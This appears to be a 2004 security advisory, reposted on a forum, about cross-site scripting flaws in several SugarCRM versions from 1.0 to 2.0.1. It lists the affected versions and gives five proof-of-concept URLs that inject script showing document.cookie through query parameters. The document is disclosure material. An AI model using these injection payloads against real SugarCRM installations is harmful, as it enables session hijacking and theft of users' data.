SugarCRM Multiple Cross-Site Scripting Vulnerability

remote
Yes

local
No

published
Dec 26, 2004

updated
Dec 27, 2004

vulnerable
SugarCRM SugarCRM 1.0 g
SugarCRM SugarCRM 1.0 f
SugarCRM SugarCRM 1.0
SugarCRM SugarCRM 1.1 f
SugarCRM SugarCRM 1.1 e
SugarCRM SugarCRM 1.1 d
SugarCRM SugarCRM 1.1 c
SugarCRM SugarCRM 1.1 b
SugarCRM SugarCRM 1.1 a
SugarCRM SugarCRM 1.1
SugarCRM SugarCRM 1.5 d
SugarCRM SugarCRM 2.0.1 a
SugarCRM SugarCRM 2.0.1

not vulnerable

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</scrip
+t>&return_action=index

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.co
+okie)</script>

http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=
+&action=ListView&query=true&module=Accounts&button=Search

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=
+d676f046-1be5-dc36-114e-4138f972bf5d

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD
ID]"><script>alert(document.cookie)</script>

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 21, 2008, 02:59:11 Boton Buscar